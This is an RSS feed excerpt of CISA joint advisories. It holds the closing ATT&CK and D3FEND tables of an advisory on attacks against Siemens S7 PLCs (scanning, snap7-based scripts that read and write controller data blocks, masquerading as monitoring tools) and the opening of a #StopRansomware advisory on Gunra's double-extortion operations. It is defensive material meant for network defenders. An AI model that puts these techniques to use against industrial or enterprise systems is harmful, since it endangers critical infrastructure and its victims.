&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology&quot;&gt;Primary Mitigations to Reduce Cyber Threats to Operational Technology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.ic3.gov/CSA/2026/260114.pdf&quot; target=&quot;_blank&quot;&gt;Secure connectivity principles for Operational Technology (OT): How organisations should design, secure, and manage connectivity in OT&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://media.defense.gov/2022/Sep/22/2003083007/-1/-1/0/CSA_ICS_Know_the_Opponent_.PDF&quot; target=&quot;_blank&quot;&gt;Control System Defense: Know the Opponent&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Incident reporting&amp;nbsp;&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA and/or the FBI. Contact CISA via CISA’s 24/7 Operations Center at &lt;a href=&quot;mailto:contact@cisa.dhs.gov&quot;&gt;contact@cisa.dhs.gov&lt;/a&gt; or 1-844-Say-CISA (1-844-729-2472). File a claim with FBI’s &lt;a href=&quot;https://ic3.gov/&quot; target=&quot;_blank&quot;&gt;Internet Crime Complaint Center&lt;/a&gt; (IC3) or contact your local &lt;a href=&quot;https://www.fbi.gov/contact-us/field-offices&quot; target=&quot;_blank&quot;&gt;FBI field office&lt;/a&gt;. When available, please include the following information regarding the incident:&amp;nbsp;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Date, time, and location of the incident;&lt;/li&gt;
&lt;li&gt;Type of activity;&lt;/li&gt;
&lt;li&gt;Number of people affected;&lt;/li&gt;
&lt;li&gt;Type of equipment used for the activity; and&lt;/li&gt;
&lt;li&gt;Name of the submitting company or organization, and a designated point of contact.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Entities required to report incidents to DOE should follow established reporting requirements, as appropriate. For other energy sector inquiries, contact &lt;a href=&quot;mailto:EnergySRMA@hq.doe.gov&quot;&gt;EnergySRMA@hq.doe.gov&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In addition, consider contacting Siemens ProductCERT via &lt;a href=&quot;https://www.siemens.com/cert&quot; target=&quot;_blank&quot;&gt;https://www.siemens.com/cert&lt;/a&gt;&amp;nbsp;or email&amp;nbsp;&lt;a href=&quot;mailto:productcert@siemens.com&quot;&gt;productcert@siemens.com&lt;/a&gt;.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Disclaimer of endorsement&lt;/strong&gt;&lt;/em&gt;&lt;br&gt;The information and opinions contained in this document are provided &quot;as is&quot; and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Purpose&lt;/strong&gt;&lt;/em&gt;&lt;br&gt;This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Contact&lt;/strong&gt;&lt;/em&gt;&lt;br&gt;Cybersecurity Report Feedback:&amp;nbsp;&lt;a href=&quot;mailto:CybersecurityReports@nsa.gov&quot;&gt;CybersecurityReports@nsa.gov&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Defense Industrial Base Inquiries and Cybersecurity Services:&amp;nbsp;&lt;a href=&quot;mailto:DIB_Defense@cyber.nsa.gov&quot;&gt;DIB_Defense@cyber.nsa.gov&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721,&amp;nbsp;&lt;a href=&quot;mailto:MediaRelations@nsa.gov&quot;&gt;MediaRelations@nsa.gov&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Contact Siemens ProductCERT for up-to-date information about the security of Siemens products or to report cybersecurity vulnerabilities at&amp;nbsp;&lt;a href=&quot;mailto:productcert@siemens.com&quot;&gt;productcert@siemens.com&lt;/a&gt;. For support with increasing the security of installed Siemens PLCs, contact Siemens Industrial Cybersecurity Services at&amp;nbsp;&lt;a href=&quot;mailto:services.automation@siemens.com&quot;&gt;services.automation@siemens.com&lt;/a&gt;. See&amp;nbsp;&lt;a href=&quot;https://www.siemens.com/en-us/content/cert-services/&quot; target=&quot;_blank&quot;&gt;Siemens ProductCERT and Siemens CERT&lt;/a&gt; for more information.&lt;/p&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;AppA&quot;&gt;&lt;strong&gt;Appendix A&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;: MITRE ATT&amp;amp;CK tactics and techniques&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;for the threat actor tactics and techniques referenced in this advisory.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table1&quot;&gt;&lt;/a&gt;&lt;em&gt;&lt;strong&gt;Table 1: MITRE ATT&amp;amp;CK tactics and techniques&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Tactic&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Reconnaissance&lt;/td&gt;
&lt;td&gt;Search Open Technical Databases: Scan Databases&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1596/005/&quot; target=&quot;_blank&quot;&gt;T1596.005&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Using Internet scanning services&amp;nbsp;to identify Internet-exposed or poorly segmented Siemens S7 Series PLCs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Resource Development&lt;/td&gt;
&lt;td&gt;Develop Capabilities: Exploits&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/004/&quot; target=&quot;_blank&quot;&gt;T1587.004&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Developing exploits for known Siemens S7 Series PLC vulnerabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Resource Development&lt;/td&gt;
&lt;td&gt;Obtain Capabilities: Artificial Intelligence&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/007/&quot; target=&quot;_blank&quot;&gt;T1588.007&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Rapidly iterating exploit code&amp;nbsp;through AI-assisted development&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;Native API&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0834/&quot; target=&quot;_blank&quot;&gt;T0834&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Deploying AI-generated Python scripts&amp;nbsp;incorporating the &lt;code&gt;snap7.dll&lt;/code&gt; library&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;Modify Controller Tasking&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0821/&quot; target=&quot;_blank&quot;&gt;T0821&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Conducting write operations&amp;nbsp;on data blocks, potentially for pre-positioning for effects operations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Evasion&lt;/td&gt;
&lt;td&gt;Masquerading&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0849/&quot; target=&quot;_blank&quot;&gt;T0849&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Masquerading as legitimate monitoring tools&amp;nbsp;to evade detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral Movement&lt;/td&gt;
&lt;td&gt;Insecure Credentials&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1694/&quot; target=&quot;_blank&quot;&gt;T1694&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Accessing exposed devices that have unconfigured (default) or minimally configured authentication&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Collection&lt;/td&gt;
&lt;td&gt;Data from Local System&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0893/&quot; target=&quot;_blank&quot;&gt;T0893&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Conducting read operations&amp;nbsp;on data blocks, potentially for reconnaissance&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;AppB&quot;&gt;&lt;strong&gt;Appendix B&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;: MITRE D3FEND countermeasures&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table2&quot;&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/a&gt; for a mapping of several of the cybersecurity countermeasures mentioned in this advisory.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table2&quot;&gt;&lt;/a&gt;&lt;em&gt;&lt;strong&gt;Table 2: MITRE D3FEND Countermeasures&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Countermeasure Title&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Hardware Component Inventory&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:HardwareComponentInventory/&quot; target=&quot;_blank&quot;&gt;D3-HCI&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Conduct an immediate inventory of all Siemens S7 Series PLCs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Software Update&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/&quot; target=&quot;_blank&quot;&gt;D3-SU&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Apply critical security patches as soon as possible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network Isolation&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkIsolation/&quot; target=&quot;_blank&quot;&gt;D3-NI&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Verify network segmentation and ensure PLCs are &lt;strong&gt;not&lt;/strong&gt; accessible from the Internet&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network Access Mediation&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkAccessMediation/&quot; target=&quot;_blank&quot;&gt;D3-NAM&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Restrict TIA Portal/STEP 7 access to authorized engineering workstations only via MAC/IP allowlisting on PLCs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Hardening&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:CredentialHardening/&quot; target=&quot;_blank&quot;&gt;D3-CH&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Enable PLC password protection on all S7 controllers&lt;/li&gt;
&lt;li&gt;Enable multi-factor authentication for all remote access to OT networks&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Platform Monitoring&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/&quot; target=&quot;_blank&quot;&gt;D3-PM&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Deploy ICS-aware intrusion detection&lt;/li&gt;
&lt;li&gt;Alert on unauthorized PUT/GET operations&lt;/li&gt;
&lt;li&gt;Monitor for unexpected behavior deviations&lt;/li&gt;
&lt;li&gt;Monitor for &lt;code&gt;snap7.dll library&lt;/code&gt; imports&lt;/li&gt;
&lt;li&gt;Hunt for indicators of compromise&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network Traffic Analysis&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis/&quot; target=&quot;_blank&quot;&gt;D3-NTA&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Alert on unexpected S7comm traffic on TCP port &lt;code&gt;102&lt;/code&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Watch for sequential IP scanning patterns&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Application Configuration Hardening&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/&quot; target=&quot;_blank&quot;&gt;D3-ACH&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Disable unused web servers and protocols&lt;/li&gt;
&lt;li&gt;Remove SNMP community strings&lt;/li&gt;
&lt;li&gt;Watch for ladder logic changes&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Notes&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt; MITRE and ATT&amp;amp;CK are registered trademarks of The MITRE Corporation. MITRE D3FEND is a trademark of the MITRE Corporation.&lt;/p&gt;
</description>
  <pubDate>Fri, 14 Aug 2026 16:06:03 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/25313</guid>
    </item>
<item>
  <title>#StopRansomware: Gunra Ransomware</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-222a</link>
  <description>&lt;h2&gt;&lt;strong&gt;Advisory at a Glance&lt;/strong&gt;&lt;/h2&gt;
&lt;table&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;Title&lt;/th&gt;
&lt;td&gt;#StopRansomware: Gunra Ransomware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Original Publication&lt;/th&gt;
&lt;td&gt;August 10, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Executive Summary&lt;/th&gt;
&lt;td&gt;Gunra is a ransomware-as-a-service (RaaS) used by affiliates to target government, critical infrastructure, and other organizations. The Gunra ransomware variant first appeared in 2025 and expanded to RaaS operations in 2026. The actors leverage a double-extortion model, both encrypting data and threatening to publish exfiltrated data to a dedicated leak site (DLS) if the ransom is not paid. This advisory provides technical details of the activity, as well as tailored detection and mitigation guidance to protect at-risk organizations from Gunra.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Key Actions&lt;/th&gt;
&lt;td&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Prioritize patching known exploited vulnerabilities in internet-facing systems&lt;/strong&gt;, including virtual private network (VPN) gateways and remote desktop protocol (RDP)-exposed infrastructure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement and test offline, immutable backups&lt;/strong&gt; stored in a physically separate, segmented location to ensure recoverability without ransom payment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Segment networks&lt;/strong&gt; to restrict lateral movement from an initially compromised device to other systems in the organization.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Indicators of Compromise&lt;/th&gt;
&lt;td&gt;
&lt;p&gt;For a downloadable copy of indicators of compromise, see:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-08/AA26-222A-stix.xml&quot;&gt;AA26-222A STIX XML&lt;/a&gt; (54 KB)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-08/AA26-222A-stix.json&quot;&gt;AA26-222A STIX JSON&lt;/a&gt; (61 KB)&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Intended Audience&lt;/th&gt;
&lt;td&gt;
&lt;p&gt;&lt;strong&gt;Organizations:&lt;/strong&gt; Government, Critical Infrastructure&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sectors: &lt;/strong&gt;&lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/healthcare-and-public-health-sector&quot; title=&quot;Healthcare and Public Health&quot;&gt;Healthcare and public health&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/financial-services-sector&quot; title=&quot;financial services&quot;&gt;financial services&lt;/a&gt; and insurance, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/critical-manufacturing-sector&quot; title=&quot;critical manufacturing&quot;&gt;critical manufacturing&lt;/a&gt; and construction, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/transportation-systems-sector&quot; title=&quot;transportation systems&quot;&gt;transportation systems&lt;/a&gt; and logistics, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector&quot; title=&quot;government services and facilities&quot;&gt;government services and facilities&lt;/a&gt;, utilities, academia, media and communications, retail, and professional and nonprofit services.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Roles:&lt;/strong&gt; &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/cybersecurity-architecture&quot; target=&quot;_blank&quot; title=&quot;Cybersecurity architects&quot;&gt;Cybersecurity architects&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/defensive-cybersecurity&quot; target=&quot;_blank&quot; title=&quot;Defensive cybersecurity analysts&quot;&gt;defensive cybersecurity analysts&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/vulnerability-analysis&quot; target=&quot;_blank&quot; title=&quot;vulnerability analysts&quot;&gt;vulnerability analysts&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/systems-administration&quot; target=&quot;_blank&quot; title=&quot;systems administrators&quot;&gt;systems administrators&lt;/a&gt;, and &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-management&quot; target=&quot;_blank&quot; title=&quot;security systems managers&quot;&gt;security systems managers&lt;/a&gt;.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note: &lt;/strong&gt;This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit &lt;a href=&quot;https://www.cisa.gov/stopransomware&quot; title=&quot;Stopransomware.gov&quot;&gt;stopransomware.gov&lt;/a&gt; to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.&lt;/p&gt;
&lt;p&gt;The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Defense Cyber Crime Center (DC3), National Security Agency (NSA), U.S. Secret Service (USSS), and Republic of Korea’s National Police Agency (KNPA)—hereafter referred to as “the authoring agencies”—are releasing this joint advisory to alert organizations to the emerging Gunra ransomware threat and to provide detection and mitigation guidance.&lt;/p&gt;
&lt;p&gt;Gunra first emerged in April 2025 as a sophisticated double-extortion ransomware variant derived from the leaked Conti&lt;a href=&quot;#Note1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt; ransomware source code. As of early 2026, Gunra expanded its operations through a structured ransomware-as-a-service (RaaS) affiliate program advertised on dark web forums to financially motivated cybercriminals. Gunra actors demand ransom via a customized, Tor-based negotiation portal and threaten to publish exfiltrated data on a dedicated leak site (DLS) if victims do not comply.&lt;/p&gt;
&lt;p&gt;Gunra victims observed on the actors’ DLS span organizations across multiple sectors in the Americas, Europe, Middle East, Africa, and the Asia-Pacific.&lt;a href=&quot;#Note2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt; These sectors include:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/healthcare-and-public-health-sector&quot; title=&quot;Healthcare and public health&quot;&gt;Healthcare and public health&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/financial-services-sector&quot; title=&quot;Financial services&quot;&gt;Financial services&lt;/a&gt; and insurance&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/critical-manufacturing-sector&quot; title=&quot;Critical manufacturing&quot;&gt;Critical manufacturing&lt;/a&gt; and construction&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/transportation-systems-sector&quot; title=&quot;Transportation systems&quot;&gt;Transportation systems&lt;/a&gt; and logistics&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector&quot; title=&quot;Government services and facilities&quot;&gt;Government services and facilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Utilities&lt;/li&gt;
&lt;li&gt;Academia&lt;/li&gt;
&lt;li&gt;Media and communications&lt;/li&gt;
&lt;li&gt;Retail&lt;/li&gt;
&lt;li&gt;Professional and nonprofit services &amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The authoring agencies encourage organizations to implement the recommendations in the &lt;a href=&quot;#Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt; section of this advisory to mitigate cyber threats related to Gunra ransomware, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Prioritizing patching known exploited vulnerabilities&lt;/strong&gt; in internet-facing systems, including virtual private network (VPN) gateways and remote desktop protocol (RDP)-exposed infrastructure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implementing and testing offline, immutable backups&lt;/strong&gt; stored in a physically separate, segmented location to ensure recoverability without ransom payment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Segmenting networks&lt;/strong&gt; to restrict lateral movement from an initially compromised device to other systems in the organization.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Download the PDF version of this report:&lt;/p&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-08/aa26-222a-stopransomware-gunra-ransomware_508c.pdf&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;AA26-222A StopRansomware Gunra Ransomware&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(PDF,       1.07 MB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;For a downloadable copy of IOCs, see:&lt;/p&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-08/AA26-222A-stix.xml&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;AA26-222A STIX XML&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(XML,       54.18 KB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-08/AA26-222A-stix.json&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;AA26-222A STIX JSON&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(JSON,       61.00 KB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Technical Details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This advisory uses the &lt;a href=&quot;https://attack.mitre.org/versions/v19/matrices/enterprise/&quot; target=&quot;_blank&quot; title=&quot;MITRE ATTACK Matrix for Enterprise&quot;&gt;MITRE ATT&amp;amp;CK&lt;sup&gt;®&lt;/sup&gt; Matrix for Enterprise&lt;/a&gt; framework, version 19.1.&amp;nbsp;See the&lt;strong&gt; &lt;/strong&gt;&lt;a href=&quot;#MITRE&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt; section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;amp;CK tactics and techniques.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The FBI originally observed Gunra ransomware in April 2025. The threat actors quickly established a DLS on the Tor network to list victims and publish exfiltrated data. As of January 2026, Gunra launched a formal RaaS affiliate program on dark web forums, providing affiliates with access to a management panel, a configurable ransomware builder, cross-platform locker payloads, and structured affiliate documentation.&lt;a href=&quot;#Note3&quot;&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;/a&gt;&lt;sup&gt; &amp;nbsp;&lt;/sup&gt;The FBI observed the group adopting new branding aliases (notably operating under the name Golden Community) to support this expansion. Gunra has further commercialized its platform by actively recruiting penetration testers and ethical hackers to serve as initial access brokers, offering a share of the ransom profits in exchange for enterprise network access.&lt;/p&gt;
&lt;p&gt;Based on FBI observations, Gunra actors use a traditional double-extortion model, exfiltrating sensitive victim data prior to encryption and threatening to publish the leaked data on their DLS unless the ransom is paid. Victims receive a ransom note in every affected directory guiding them to a Tor-based negotiation portal where they are assigned a Client ID and an initial password. Subsequently, victims receive instructions to contact the Gunra actors via qTox (an encrypted messaging application) to negotiate ransom payments within five to seven days. If the ransom is not paid, Gunra actors threaten to sell victim data on the DLS.&lt;/p&gt;
